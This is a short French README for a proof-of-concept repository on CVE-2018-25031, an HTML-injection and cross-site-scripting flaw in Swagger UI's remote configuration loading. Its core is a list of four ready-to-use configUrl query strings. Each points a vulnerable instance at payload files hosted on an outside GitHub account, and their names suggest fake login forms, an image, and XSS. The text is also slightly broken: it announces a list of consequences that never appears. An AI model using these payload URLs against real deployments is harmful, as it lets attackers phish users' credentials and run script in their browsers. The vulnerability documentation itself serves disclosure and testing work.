
Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].
Swagger UI est une bibliothèque largement utilisée qui rend les spécifications OpenAPI (anciennement Swagger) sous forme d'une interface web interactive. Elle permet aux développeurs et intégrateurs d'explorer et de tester des API sans avoir l'implémentation backend en place.
La vulnérabilité provient d'une validation insuffisante des paramètres de requête URL utilisés pour charger des fichiers de configuration ou de spécifications distants par le client Swagger UI. Les paramètres courants impliqués sont :
?url=.yaml?configUrl=.jsonUn attaquant peut pointer ces paramètres vers une définition OpenAPI ou un fichier de configuration contrôlé par l'attaquant et hébergé à distance, qui peut être rendu par une instance vulnérable.
Le chargement d'un fichier distant malveillant peut permettre plusieurs conséquences à fort impact selon la configuration d'hébergement et les protections en place :
Références :
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json
Le contenu de ce dépôt est fourni à des fins éducatives et informatives uniquement. L'auteur n'est pas responsable de toute mauvaise utilisation. Assurez-vous d'avoir une autorisation appropriée avant utilisation, agissez de manière responsable à vos propres risques et suivez toutes les directives légales et éthiques.